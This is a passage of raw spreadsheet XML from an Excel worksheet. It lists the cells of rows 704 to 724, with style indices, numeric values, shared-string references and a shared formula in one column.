      <c r="X704" s="45"/>
      <c r="Y704" s="45"/>
      <c r="Z704" s="38" t="s">
        <v>3116</v>
      </c>
      <c r="AA704" s="39" t="s">
        <v>3117</v>
      </c>
      <c r="AB704" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC704" s="40">
        <v>246573.0</v>
      </c>
      <c r="AD704" s="5"/>
      <c r="AE704" s="14"/>
      <c r="AF704" s="14"/>
    </row>
    <row r="705">
      <c r="A705" s="6">
        <f t="shared" si="1"/>
        <v>0.2806745868</v>
      </c>
      <c r="B705" s="29">
        <v>1.0</v>
      </c>
      <c r="C705" s="15"/>
      <c r="D705" s="14"/>
      <c r="E705" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F705" s="14"/>
      <c r="G705" s="29">
        <v>2.0</v>
      </c>
      <c r="H705" s="29">
        <v>130.0</v>
      </c>
      <c r="I705" s="29">
        <v>105248.0</v>
      </c>
      <c r="J705" s="15"/>
      <c r="K705" s="29">
        <v>105248.0</v>
      </c>
      <c r="L705" s="15"/>
      <c r="M705" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N705" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O705" s="29">
        <v>1.0</v>
      </c>
      <c r="P705" s="29">
        <v>6.0</v>
      </c>
      <c r="Q705" s="15"/>
      <c r="R705" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S705" s="15"/>
      <c r="T705" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U705" s="5"/>
      <c r="V705" s="5"/>
      <c r="W705" s="47"/>
      <c r="X705" s="45"/>
      <c r="Y705" s="45"/>
      <c r="Z705" s="38" t="s">
        <v>3118</v>
      </c>
      <c r="AA705" s="39" t="s">
        <v>3119</v>
      </c>
      <c r="AB705" s="38" t="s">
        <v>488</v>
      </c>
      <c r="AC705" s="40">
        <v>237428.0</v>
      </c>
      <c r="AD705" s="5"/>
      <c r="AE705" s="14"/>
      <c r="AF705" s="14"/>
    </row>
    <row r="706">
      <c r="A706" s="6">
        <f t="shared" si="1"/>
        <v>0.8951700464</v>
      </c>
      <c r="B706" s="29">
        <v>1.0</v>
      </c>
      <c r="C706" s="29">
        <v>197768.0</v>
      </c>
      <c r="D706" s="14"/>
      <c r="E706" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F706" s="14"/>
      <c r="G706" s="29">
        <v>2.0</v>
      </c>
      <c r="H706" s="29">
        <v>408.0</v>
      </c>
      <c r="I706" s="29">
        <v>49767.0</v>
      </c>
      <c r="J706" s="15"/>
      <c r="K706" s="29">
        <v>61443.0</v>
      </c>
      <c r="L706" s="15"/>
      <c r="M706" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N706" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O706" s="29">
        <v>2.0</v>
      </c>
      <c r="P706" s="29">
        <v>1.0</v>
      </c>
      <c r="Q706" s="15"/>
      <c r="R706" s="15"/>
      <c r="S706" s="15"/>
      <c r="T706" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U706" s="5"/>
      <c r="V706" s="5"/>
      <c r="W706" s="47"/>
      <c r="X706" s="45"/>
      <c r="Y706" s="45"/>
      <c r="Z706" s="38" t="s">
        <v>3120</v>
      </c>
      <c r="AA706" s="39" t="s">
        <v>3121</v>
      </c>
      <c r="AB706" s="38" t="s">
        <v>3122</v>
      </c>
      <c r="AC706" s="40">
        <v>197766.0</v>
      </c>
      <c r="AD706" s="5"/>
      <c r="AE706" s="14"/>
      <c r="AF706" s="14"/>
    </row>
    <row r="707">
      <c r="A707" s="6">
        <f t="shared" si="1"/>
        <v>0.3597618334</v>
      </c>
      <c r="B707" s="29">
        <v>1.0</v>
      </c>
      <c r="C707" s="29">
        <v>32931.0</v>
      </c>
      <c r="D707" s="14"/>
      <c r="E707" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F707" s="14"/>
      <c r="G707" s="29">
        <v>39.0</v>
      </c>
      <c r="H707" s="29">
        <v>73695.0</v>
      </c>
      <c r="I707" s="29">
        <v>22332.0</v>
      </c>
      <c r="J707" s="15"/>
      <c r="K707" s="29">
        <v>6253.0</v>
      </c>
      <c r="L707" s="15"/>
      <c r="M707" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N707" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O707" s="29">
        <v>6.0</v>
      </c>
      <c r="P707" s="29">
        <v>0.0</v>
      </c>
      <c r="Q707" s="15"/>
      <c r="R707" s="15"/>
      <c r="S707" s="15"/>
      <c r="T707" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U707" s="5"/>
      <c r="V707" s="5"/>
      <c r="W707" s="47"/>
      <c r="X707" s="45"/>
      <c r="Y707" s="45"/>
      <c r="Z707" s="38" t="s">
        <v>3123</v>
      </c>
      <c r="AA707" s="39" t="s">
        <v>3124</v>
      </c>
      <c r="AB707" s="38" t="s">
        <v>3125</v>
      </c>
      <c r="AC707" s="40">
        <v>32928.0</v>
      </c>
      <c r="AD707" s="5"/>
      <c r="AE707" s="14"/>
      <c r="AF707" s="14"/>
    </row>
    <row r="708">
      <c r="A708" s="6">
        <f t="shared" si="1"/>
        <v>0.8005978746</v>
      </c>
      <c r="B708" s="29">
        <v>1.0</v>
      </c>
      <c r="C708" s="14"/>
      <c r="D708" s="14"/>
      <c r="E708" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F708" s="14"/>
      <c r="G708" s="29">
        <v>1.0</v>
      </c>
      <c r="H708" s="29">
        <v>1159.0</v>
      </c>
      <c r="I708" s="29">
        <v>133337.0</v>
      </c>
      <c r="J708" s="15"/>
      <c r="K708" s="15"/>
      <c r="L708" s="15"/>
      <c r="M708" s="15"/>
      <c r="N708" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O708" s="29">
        <v>2.0</v>
      </c>
      <c r="P708" s="29">
        <v>3.0</v>
      </c>
      <c r="Q708" s="15"/>
      <c r="R708" s="15"/>
      <c r="S708" s="15"/>
      <c r="T708" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U708" s="5"/>
      <c r="V708" s="5"/>
      <c r="W708" s="47"/>
      <c r="X708" s="45"/>
      <c r="Y708" s="45"/>
      <c r="Z708" s="38" t="s">
        <v>3126</v>
      </c>
      <c r="AA708" s="39" t="s">
        <v>3127</v>
      </c>
      <c r="AB708" s="38" t="s">
        <v>3128</v>
      </c>
      <c r="AC708" s="40">
        <v>161951.0</v>
      </c>
      <c r="AD708" s="5"/>
      <c r="AE708" s="14"/>
      <c r="AF708" s="14"/>
    </row>
    <row r="709">
      <c r="A709" s="6">
        <f t="shared" si="1"/>
        <v>0.4581849917</v>
      </c>
      <c r="B709" s="29">
        <v>1.0</v>
      </c>
      <c r="C709" s="15"/>
      <c r="D709" s="14"/>
      <c r="E709" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F709" s="14"/>
      <c r="G709" s="29">
        <v>0.0</v>
      </c>
      <c r="H709" s="29">
        <v>865.0</v>
      </c>
      <c r="I709" s="29">
        <v>96606.0</v>
      </c>
      <c r="J709" s="15"/>
      <c r="K709" s="29">
        <v>139846.0</v>
      </c>
      <c r="L709" s="15"/>
      <c r="M709" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N709" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O709" s="29">
        <v>2.0</v>
      </c>
      <c r="P709" s="29">
        <v>2.0</v>
      </c>
      <c r="Q709" s="15"/>
      <c r="R709" s="15"/>
      <c r="S709" s="15"/>
      <c r="T709" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U709" s="5"/>
      <c r="V709" s="5"/>
      <c r="W709" s="47"/>
      <c r="X709" s="45"/>
      <c r="Y709" s="45"/>
      <c r="Z709" s="38" t="s">
        <v>3129</v>
      </c>
      <c r="AA709" s="39" t="s">
        <v>3130</v>
      </c>
      <c r="AB709" s="38" t="s">
        <v>395</v>
      </c>
      <c r="AC709" s="40">
        <v>151719.0</v>
      </c>
      <c r="AD709" s="5"/>
      <c r="AE709" s="14"/>
      <c r="AF709" s="14"/>
    </row>
    <row r="710">
      <c r="A710" s="6">
        <f t="shared" si="1"/>
        <v>0.2926370927</v>
      </c>
      <c r="B710" s="29">
        <v>1.0</v>
      </c>
      <c r="C710" s="15"/>
      <c r="D710" s="14"/>
      <c r="E710" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F710" s="14"/>
      <c r="G710" s="29">
        <v>24.0</v>
      </c>
      <c r="H710" s="29">
        <v>25926.0</v>
      </c>
      <c r="I710" s="29">
        <v>232878.0</v>
      </c>
      <c r="J710" s="15"/>
      <c r="K710" s="29">
        <v>70406.0</v>
      </c>
      <c r="L710" s="15"/>
      <c r="M710" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N710" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O710" s="29">
        <v>4.0</v>
      </c>
      <c r="P710" s="29">
        <v>2.0</v>
      </c>
      <c r="Q710" s="15"/>
      <c r="R710" s="15"/>
      <c r="S710" s="15"/>
      <c r="T710" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U710" s="5"/>
      <c r="V710" s="5"/>
      <c r="W710" s="47"/>
      <c r="X710" s="45"/>
      <c r="Y710" s="45"/>
      <c r="Z710" s="38" t="s">
        <v>3131</v>
      </c>
      <c r="AA710" s="39" t="s">
        <v>3132</v>
      </c>
      <c r="AB710" s="38" t="s">
        <v>1114</v>
      </c>
      <c r="AC710" s="40">
        <v>230309.0</v>
      </c>
      <c r="AD710" s="5"/>
      <c r="AE710" s="14"/>
      <c r="AF710" s="14"/>
    </row>
    <row r="711">
      <c r="A711" s="6">
        <f t="shared" si="1"/>
        <v>0.1560753968</v>
      </c>
      <c r="B711" s="29">
        <v>1.0</v>
      </c>
      <c r="C711" s="29">
        <v>195130.0</v>
      </c>
      <c r="D711" s="14"/>
      <c r="E711" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F711" s="14"/>
      <c r="G711" s="29">
        <v>1.0</v>
      </c>
      <c r="H711" s="29">
        <v>236.0</v>
      </c>
      <c r="I711" s="29">
        <v>169954.0</v>
      </c>
      <c r="J711" s="15"/>
      <c r="K711" s="29">
        <v>187794.0</v>
      </c>
      <c r="L711" s="15"/>
      <c r="M711" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N711" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O711" s="29">
        <v>2.0</v>
      </c>
      <c r="P711" s="29">
        <v>0.0</v>
      </c>
      <c r="Q711" s="15"/>
      <c r="R711" s="15"/>
      <c r="S711" s="15"/>
      <c r="T711" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U711" s="5"/>
      <c r="V711" s="5"/>
      <c r="W711" s="47"/>
      <c r="X711" s="45"/>
      <c r="Y711" s="45"/>
      <c r="Z711" s="38" t="s">
        <v>3133</v>
      </c>
      <c r="AA711" s="39" t="s">
        <v>3134</v>
      </c>
      <c r="AB711" s="38" t="s">
        <v>3135</v>
      </c>
      <c r="AC711" s="40">
        <v>195095.0</v>
      </c>
      <c r="AD711" s="5"/>
      <c r="AE711" s="14"/>
      <c r="AF711" s="14"/>
    </row>
    <row r="712">
      <c r="A712" s="6">
        <f t="shared" si="1"/>
        <v>0.8602747155</v>
      </c>
      <c r="B712" s="29">
        <v>1.0</v>
      </c>
      <c r="C712" s="29">
        <v>101937.0</v>
      </c>
      <c r="D712" s="14"/>
      <c r="E712" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F712" s="14"/>
      <c r="G712" s="29">
        <v>4.0</v>
      </c>
      <c r="H712" s="29">
        <v>1019.0</v>
      </c>
      <c r="I712" s="29">
        <v>88432.0</v>
      </c>
      <c r="J712" s="15"/>
      <c r="K712" s="29">
        <v>98538.0</v>
      </c>
      <c r="L712" s="15"/>
      <c r="M712" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N712" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O712" s="29">
        <v>4.0</v>
      </c>
      <c r="P712" s="29">
        <v>0.0</v>
      </c>
      <c r="Q712" s="15"/>
      <c r="R712" s="15"/>
      <c r="S712" s="15"/>
      <c r="T712" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U712" s="5"/>
      <c r="V712" s="5"/>
      <c r="W712" s="47"/>
      <c r="X712" s="45"/>
      <c r="Y712" s="45"/>
      <c r="Z712" s="38" t="s">
        <v>3136</v>
      </c>
      <c r="AA712" s="39" t="s">
        <v>3137</v>
      </c>
      <c r="AB712" s="38" t="s">
        <v>3138</v>
      </c>
      <c r="AC712" s="40">
        <v>101899.0</v>
      </c>
      <c r="AD712" s="5"/>
      <c r="AE712" s="14"/>
      <c r="AF712" s="14"/>
    </row>
    <row r="713">
      <c r="A713" s="6">
        <f t="shared" si="1"/>
        <v>0.5061197119</v>
      </c>
      <c r="B713" s="29">
        <v>1.0</v>
      </c>
      <c r="C713" s="15"/>
      <c r="D713" s="14"/>
      <c r="E713" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F713" s="14"/>
      <c r="G713" s="29">
        <v>1.0</v>
      </c>
      <c r="H713" s="29">
        <v>113.0</v>
      </c>
      <c r="I713" s="29">
        <v>175378.0</v>
      </c>
      <c r="J713" s="15"/>
      <c r="K713" s="15"/>
      <c r="L713" s="15"/>
      <c r="M713" s="14"/>
      <c r="N713" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O713" s="29">
        <v>0.0</v>
      </c>
      <c r="P713" s="29">
        <v>2.0</v>
      </c>
      <c r="Q713" s="15"/>
      <c r="R713" s="15"/>
      <c r="S713" s="15"/>
      <c r="T713" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U713" s="5"/>
      <c r="V713" s="5"/>
      <c r="W713" s="47"/>
      <c r="X713" s="45"/>
      <c r="Y713" s="45"/>
      <c r="Z713" s="38" t="s">
        <v>3139</v>
      </c>
      <c r="AA713" s="39" t="s">
        <v>3140</v>
      </c>
      <c r="AB713" s="38" t="s">
        <v>3141</v>
      </c>
      <c r="AC713" s="40">
        <v>196573.0</v>
      </c>
      <c r="AD713" s="5"/>
      <c r="AE713" s="14"/>
      <c r="AF713" s="14"/>
    </row>
    <row r="714">
      <c r="A714" s="6">
        <f t="shared" si="1"/>
        <v>0.5578545603</v>
      </c>
      <c r="B714" s="29">
        <v>1.0</v>
      </c>
      <c r="C714" s="14"/>
      <c r="D714" s="14"/>
      <c r="E714" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F714" s="14"/>
      <c r="G714" s="29">
        <v>0.0</v>
      </c>
      <c r="H714" s="29">
        <v>26.0</v>
      </c>
      <c r="I714" s="29">
        <v>288507.0</v>
      </c>
      <c r="J714" s="15"/>
      <c r="K714" s="15"/>
      <c r="L714" s="15"/>
      <c r="M714" s="15"/>
      <c r="N714" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O714" s="29">
        <v>0.0</v>
      </c>
      <c r="P714" s="29">
        <v>2.0</v>
      </c>
      <c r="Q714" s="15"/>
      <c r="R714" s="36" t="s">
        <v>30</v>
      </c>
      <c r="S714" s="15"/>
      <c r="T714" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U714" s="5"/>
      <c r="V714" s="5"/>
      <c r="W714" s="47"/>
      <c r="X714" s="45"/>
      <c r="Y714" s="45"/>
      <c r="Z714" s="38" t="s">
        <v>3142</v>
      </c>
      <c r="AA714" s="39" t="s">
        <v>3143</v>
      </c>
      <c r="AB714" s="38" t="s">
        <v>3144</v>
      </c>
      <c r="AC714" s="40">
        <v>268037.0</v>
      </c>
      <c r="AD714" s="5"/>
      <c r="AE714" s="14"/>
      <c r="AF714" s="14"/>
    </row>
    <row r="715">
      <c r="A715" s="6">
        <f t="shared" si="1"/>
        <v>0.7460564393</v>
      </c>
      <c r="B715" s="29">
        <v>1.0</v>
      </c>
      <c r="C715" s="29">
        <v>32435.0</v>
      </c>
      <c r="D715" s="14"/>
      <c r="E715" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F715" s="14"/>
      <c r="G715" s="29">
        <v>25.0</v>
      </c>
      <c r="H715" s="29">
        <v>2406.0</v>
      </c>
      <c r="I715" s="29">
        <v>2553.0</v>
      </c>
      <c r="J715" s="15"/>
      <c r="K715" s="29">
        <v>-1.0</v>
      </c>
      <c r="L715" s="15"/>
      <c r="M715" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N715" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O715" s="29">
        <v>3.0</v>
      </c>
      <c r="P715" s="29">
        <v>1.0</v>
      </c>
      <c r="Q715" s="15"/>
      <c r="R715" s="15"/>
      <c r="S715" s="15"/>
      <c r="T715" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U715" s="5"/>
      <c r="V715" s="5"/>
      <c r="W715" s="47"/>
      <c r="X715" s="45"/>
      <c r="Y715" s="45"/>
      <c r="Z715" s="38" t="s">
        <v>3145</v>
      </c>
      <c r="AA715" s="39" t="s">
        <v>3146</v>
      </c>
      <c r="AB715" s="38" t="s">
        <v>3147</v>
      </c>
      <c r="AC715" s="40">
        <v>32433.0</v>
      </c>
      <c r="AD715" s="5"/>
      <c r="AE715" s="14"/>
      <c r="AF715" s="14"/>
    </row>
    <row r="716">
      <c r="A716" s="6">
        <f t="shared" si="1"/>
        <v>0.5018213116</v>
      </c>
      <c r="B716" s="29">
        <v>1.0</v>
      </c>
      <c r="C716" s="15"/>
      <c r="D716" s="14"/>
      <c r="E716" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F716" s="14"/>
      <c r="G716" s="29">
        <v>3.0</v>
      </c>
      <c r="H716" s="29">
        <v>1136.0</v>
      </c>
      <c r="I716" s="29">
        <v>133671.0</v>
      </c>
      <c r="J716" s="15"/>
      <c r="K716" s="15"/>
      <c r="L716" s="15"/>
      <c r="M716" s="15"/>
      <c r="N716" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O716" s="29">
        <v>2.0</v>
      </c>
      <c r="P716" s="29">
        <v>1.0</v>
      </c>
      <c r="Q716" s="15"/>
      <c r="R716" s="15"/>
      <c r="S716" s="15"/>
      <c r="T716" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U716" s="5"/>
      <c r="V716" s="5"/>
      <c r="W716" s="47"/>
      <c r="X716" s="45"/>
      <c r="Y716" s="45"/>
      <c r="Z716" s="38" t="s">
        <v>3148</v>
      </c>
      <c r="AA716" s="39" t="s">
        <v>3149</v>
      </c>
      <c r="AB716" s="38" t="s">
        <v>3150</v>
      </c>
      <c r="AC716" s="40">
        <v>145578.0</v>
      </c>
      <c r="AD716" s="5"/>
      <c r="AE716" s="14"/>
      <c r="AF716" s="14"/>
    </row>
    <row r="717">
      <c r="A717" s="6">
        <f t="shared" si="1"/>
        <v>0.9243699386</v>
      </c>
      <c r="B717" s="29">
        <v>1.0</v>
      </c>
      <c r="C717" s="29">
        <v>17779.0</v>
      </c>
      <c r="D717" s="14"/>
      <c r="E717" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F717" s="14"/>
      <c r="G717" s="29">
        <v>0.0</v>
      </c>
      <c r="H717" s="29">
        <v>571.0</v>
      </c>
      <c r="I717" s="29">
        <v>5501.0</v>
      </c>
      <c r="J717" s="15"/>
      <c r="K717" s="29">
        <v>5133.0</v>
      </c>
      <c r="L717" s="15"/>
      <c r="M717" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N717" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O717" s="29">
        <v>2.0</v>
      </c>
      <c r="P717" s="29">
        <v>1.0</v>
      </c>
      <c r="Q717" s="15"/>
      <c r="R717" s="15"/>
      <c r="S717" s="15"/>
      <c r="T717" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U717" s="5"/>
      <c r="V717" s="5"/>
      <c r="W717" s="47"/>
      <c r="X717" s="45"/>
      <c r="Y717" s="45"/>
      <c r="Z717" s="38" t="s">
        <v>3151</v>
      </c>
      <c r="AA717" s="39" t="s">
        <v>3152</v>
      </c>
      <c r="AB717" s="38" t="s">
        <v>3153</v>
      </c>
      <c r="AC717" s="40">
        <v>17778.0</v>
      </c>
      <c r="AD717" s="5"/>
      <c r="AE717" s="14"/>
      <c r="AF717" s="14"/>
    </row>
    <row r="718">
      <c r="A718" s="6">
        <f t="shared" si="1"/>
        <v>0.6320028467</v>
      </c>
      <c r="B718" s="29">
        <v>1.0</v>
      </c>
      <c r="C718" s="14"/>
      <c r="D718" s="14"/>
      <c r="E718" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F718" s="14"/>
      <c r="G718" s="29">
        <v>0.0</v>
      </c>
      <c r="H718" s="29">
        <v>58.0</v>
      </c>
      <c r="I718" s="29">
        <v>193142.0</v>
      </c>
      <c r="J718" s="15"/>
      <c r="K718" s="15"/>
      <c r="L718" s="15"/>
      <c r="M718" s="15"/>
      <c r="N718" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O718" s="29">
        <v>2.0</v>
      </c>
      <c r="P718" s="29">
        <v>0.0</v>
      </c>
      <c r="Q718" s="15"/>
      <c r="R718" s="15"/>
      <c r="S718" s="15"/>
      <c r="T718" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U718" s="5"/>
      <c r="V718" s="5"/>
      <c r="W718" s="47"/>
      <c r="X718" s="45"/>
      <c r="Y718" s="45"/>
      <c r="Z718" s="38" t="s">
        <v>3154</v>
      </c>
      <c r="AA718" s="39" t="s">
        <v>3155</v>
      </c>
      <c r="AB718" s="38" t="s">
        <v>3156</v>
      </c>
      <c r="AC718" s="40">
        <v>267891.0</v>
      </c>
      <c r="AD718" s="5"/>
      <c r="AE718" s="14"/>
      <c r="AF718" s="14"/>
    </row>
    <row r="719">
      <c r="A719" s="6">
        <f t="shared" si="1"/>
        <v>0.8639939725</v>
      </c>
      <c r="B719" s="29">
        <v>1.0</v>
      </c>
      <c r="C719" s="15"/>
      <c r="D719" s="14"/>
      <c r="E719" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F719" s="14"/>
      <c r="G719" s="29">
        <v>15.0</v>
      </c>
      <c r="H719" s="29">
        <v>4666.0</v>
      </c>
      <c r="I719" s="29">
        <v>148457.0</v>
      </c>
      <c r="J719" s="15"/>
      <c r="K719" s="29">
        <v>167377.0</v>
      </c>
      <c r="L719" s="15"/>
      <c r="M719" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N719" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O719" s="29">
        <v>6.0</v>
      </c>
      <c r="P719" s="29">
        <v>9.0</v>
      </c>
      <c r="Q719" s="15"/>
      <c r="R719" s="15"/>
      <c r="S719" s="15"/>
      <c r="T719" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U719" s="5"/>
      <c r="V719" s="5"/>
      <c r="W719" s="47"/>
      <c r="X719" s="45"/>
      <c r="Y719" s="45"/>
      <c r="Z719" s="38" t="s">
        <v>3157</v>
      </c>
      <c r="AA719" s="39" t="s">
        <v>3158</v>
      </c>
      <c r="AB719" s="38" t="s">
        <v>3159</v>
      </c>
      <c r="AC719" s="40">
        <v>159600.0</v>
      </c>
      <c r="AD719" s="5"/>
      <c r="AE719" s="14"/>
      <c r="AF719" s="14"/>
    </row>
    <row r="720">
      <c r="A720" s="6">
        <f t="shared" si="1"/>
        <v>0.3628904823</v>
      </c>
      <c r="B720" s="29">
        <v>1.0</v>
      </c>
      <c r="C720" s="14"/>
      <c r="D720" s="14"/>
      <c r="E720" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F720" s="14"/>
      <c r="G720" s="29">
        <v>2.0</v>
      </c>
      <c r="H720" s="29">
        <v>206.0</v>
      </c>
      <c r="I720" s="29">
        <v>141087.0</v>
      </c>
      <c r="J720" s="15"/>
      <c r="K720" s="15"/>
      <c r="L720" s="15"/>
      <c r="M720" s="14"/>
      <c r="N720" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O720" s="29">
        <v>3.0</v>
      </c>
      <c r="P720" s="29">
        <v>0.0</v>
      </c>
      <c r="Q720" s="15"/>
      <c r="R720" s="15"/>
      <c r="S720" s="15"/>
      <c r="T720" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U720" s="5"/>
      <c r="V720" s="5"/>
      <c r="W720" s="47"/>
      <c r="X720" s="45"/>
      <c r="Y720" s="45"/>
      <c r="Z720" s="38" t="s">
        <v>3160</v>
      </c>
      <c r="AA720" s="39" t="s">
        <v>3161</v>
      </c>
      <c r="AB720" s="38" t="s">
        <v>3162</v>
      </c>
      <c r="AC720" s="40">
        <v>163451.0</v>
      </c>
      <c r="AD720" s="5"/>
      <c r="AE720" s="14"/>
      <c r="AF720" s="14"/>
    </row>
    <row r="721">
      <c r="A721" s="6">
        <f t="shared" si="1"/>
        <v>0.8146840401</v>
      </c>
      <c r="B721" s="29">
        <v>1.0</v>
      </c>
      <c r="C721" s="14"/>
      <c r="D721" s="14"/>
      <c r="E721" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F721" s="14"/>
      <c r="G721" s="29">
        <v>4.0</v>
      </c>
      <c r="H721" s="29">
        <v>415.0</v>
      </c>
      <c r="I721" s="29">
        <v>17339.0</v>
      </c>
      <c r="J721" s="15"/>
      <c r="K721" s="15"/>
      <c r="L721" s="15"/>
      <c r="M721" s="15"/>
      <c r="N721" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O721" s="29">
        <v>0.0</v>
      </c>
      <c r="P721" s="29">
        <v>5.0</v>
      </c>
      <c r="Q721" s="15"/>
      <c r="R721" s="15"/>
      <c r="S721" s="15"/>
      <c r="T721" s="5" t="s">
        <v>70</v>
      </c>
      <c r="U721" s="5"/>
      <c r="V721" s="5"/>
      <c r="W721" s="47"/>
      <c r="X721" s="45"/>
      <c r="Y721" s="45"/>
      <c r="Z721" s="38" t="s">
        <v>3163</v>
      </c>
      <c r="AA721" s="39" t="s">
        <v>3164</v>
      </c>
      <c r="AB721" s="38" t="s">
        <v>3165</v>
      </c>
      <c r="AC721" s="40">
        <v>245501.0</v>
      </c>
      <c r="AD721" s="5"/>
      <c r="AE721" s="14"/>
      <c r="AF721" s="14"/>
    </row>
    <row r="722">
      <c r="A722" s="6">
        <f t="shared" si="1"/>
        <v>0.1302335334</v>
      </c>
      <c r="B722" s="29">
        <v>1.0</v>
      </c>
      <c r="C722" s="15"/>
      <c r="D722" s="14"/>
      <c r="E722" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F722" s="14"/>
      <c r="G722" s="29">
        <v>2.0</v>
      </c>
      <c r="H722" s="29">
        <v>898.0</v>
      </c>
      <c r="I722" s="29">
        <v>91016.0</v>
      </c>
      <c r="J722" s="15"/>
      <c r="K722" s="29">
        <v>485.0</v>
      </c>
      <c r="L722" s="15"/>
      <c r="M722" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N722" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O722" s="29">
        <v>1.0</v>
      </c>
      <c r="P722" s="29">
        <v>2.0</v>
      </c>
      <c r="Q722" s="15"/>
      <c r="R722" s="15"/>
      <c r="S722" s="15"/>
      <c r="T722" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U722" s="5"/>
      <c r="V722" s="5"/>
      <c r="W722" s="47"/>
      <c r="X722" s="45"/>
      <c r="Y722" s="45"/>
      <c r="Z722" s="38" t="s">
        <v>3166</v>
      </c>
      <c r="AA722" s="39" t="s">
        <v>3167</v>
      </c>
      <c r="AB722" s="38" t="s">
        <v>3168</v>
      </c>
      <c r="AC722" s="40">
        <v>104535.0</v>
      </c>
      <c r="AD722" s="5"/>
      <c r="AE722" s="14"/>
      <c r="AF722" s="14"/>
    </row>
    <row r="723">
      <c r="A723" s="6">
        <f t="shared" si="1"/>
        <v>0.4612489245</v>
      </c>
      <c r="B723" s="29">
        <v>1.0</v>
      </c>
      <c r="C723" s="29">
        <v>166496.0</v>
      </c>
      <c r="D723" s="14"/>
      <c r="E723" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F723" s="14"/>
      <c r="G723" s="29">
        <v>6.0</v>
      </c>
      <c r="H723" s="29">
        <v>387.0</v>
      </c>
      <c r="I723" s="29">
        <v>63845.0</v>
      </c>
      <c r="J723" s="15"/>
      <c r="K723" s="29">
        <v>83641.0</v>
      </c>
      <c r="L723" s="15"/>
      <c r="M723" s="36" t="s">
        <v>30</v>
      </c>
      <c r="N723" s="36" t="s">
        <v>30</v>
      </c>
      <c r="O723" s="29">
        <v>1.0</v>
      </c>
      <c r="P723" s="29">
        <v>1.0</v>
      </c>
      <c r="Q723" s="15"/>
      <c r="R723" s="15"/>
      <c r="S723" s="15"/>
      <c r="T723" s="5" t="s">
        <v>37</v>
      </c>
      <c r="U723" s="5"/>
      <c r="V723" s="5"/>
      <c r="W723" s="47"/>
      <c r="X723" s="45"/>
      <c r="Y723" s="45"/>
      <c r="Z723" s="38" t="s">
        <v>3169</v>
      </c>
      <c r="AA723" s="39" t="s">
        <v>3170</v>
      </c>
      <c r="AB723" s="38" t="s">
        <v>3171</v>
      </c>
      <c r="AC723" s="40">
        <v>166482.0</v>
      </c>
      <c r="AD723" s="5"/>
      <c r="AE723" s="14"/>
      <c r="AF723" s="14"/>
    </row>
    <row r="724">
      <c r="A724" s="6">
        <f t="shared" si="1"/>
        <v>0.3964036431</v>
      </c>
      <c r="B724" s="29">
        <v>1.0</v>
      </c>
      <c r="C724" s="15"/>
      <c r="D724" s="14"/>
      <c r="E724" s="36" t="s">
        <v>30</v>
      </c>
      <c r="F724" s="14"/>
      <c r="G724" s="29">
        <v>0.0</v>
      </c>
      <c r="H724" s="29">
        <v>253.0</v>
      </c>
      <c r="I724" s="29">
        <v>260381.0</v>
      </c>
      <c r="J724" s="15"/>
      <c r="K724" s="29">
        <v>172946.0</v>
      </c>
      <c r="L724" s="15"/>
      <c r="M724" s="36" t="s">
        <v>30</v>
      </c>
